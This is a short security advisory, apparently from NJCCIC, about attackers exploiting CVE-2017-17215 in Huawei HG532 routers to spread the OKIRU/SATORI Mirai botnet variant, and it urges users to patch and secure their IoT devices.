Zero-Day In Huawei Routers Exploited to Create Botnet

A threat actor executed hundreds of thousands of attempts to exploit a zero-day vulnerability CVE-2017-17215 in the Huawei HG532 home router in an effort to create an updated variant of the Mirai botnet. The implementation of the Universal Plug and Play (UPnP) protocol via the TR-064 technical report standard allowed remote attackers to execute arbitrary commands on the device. The OKIRU/SATORI malware was injected into the targeted devices. The majority of these exploit attempts were observed in the US, Italy, Germany, and Egypt. It was determined that the perpetrator of these attacks was an amateur hacker under the name “Nexus Zeta,” exemplifying the increased risk to internet-of-things (IoT) devices even from unskilled threat actors. Check Point researchers disclosed their findings to Huawei who have since patched the vulnerability and pushed an update to its customers. The NJCCIC recommends users and administrators of the Huawei HG532 home router review the Check Point report and the Huawei Security Notice, and ensure their device has been updated to the most current version. Additionally, all users and administrators of IoT devices, such as routers, are highly encouraged to ensure devices are properly configured and secured upon connecting them to a network, and to always keep hardware and software up-to-date.